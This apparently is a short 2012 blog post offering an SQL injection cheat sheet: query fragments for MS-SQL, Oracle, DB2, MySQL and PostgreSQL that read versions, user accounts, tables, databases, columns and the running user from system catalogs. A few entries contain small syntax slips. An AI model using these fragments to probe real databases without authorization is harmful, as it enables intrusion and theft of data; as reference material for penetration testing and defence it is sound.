Sql Injection Cheat Sheet
Posted on Tuesday, January 03, 2012 by Tenderfoot
Common SQL Injection Commands for Backend Databases | |
MS-SQL | |
Grab version | @@version |
Users | name FROM master..syslogins |
Tables | name FROM master..sysobjects WHERE xtype = ‘U’ |
Database | name FROM master..sysdatabases; |
Columns | name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’) |
Running User | DB_NAME() |
Oracle | |
Grab version | table v$version compare with ‘Oracle%’ |
Users | * from dba_users |
Tables | table_name from all_tables |
Database | distinct owner from all_tables |
Columns | column_name from all_tab_columns where table_name=‘<TABLENAME> |
Running User | user from dual |
IBM DB2 | |
Grab version | Versionnumber from sysibm.sysversions; |
Users | user from sysibm.sysdummy1 |
Tables | name from sysibm.systables |
Database | schemaname from syscat.schemata |
Columns | name, tbname, coltype from sysibm.syscolumns |
Running User | user from sysibm.sysdummy1 |
MySQL | |
Grab version | @@version |
Users | * from mysql.user |
Tables | table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
Database | distinct(db) FROM mysql.db |
Columns | table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’ |
Running User | user() |
PostgreSQL | |
Grab version | version() |
Users | * from pg_user |
Database | datname FROM pg_database |
Running User | user; |
Subscribe to:
Post Comments (Atom)
No Response to "Sql Injection Cheat Sheet"
Leave A Reply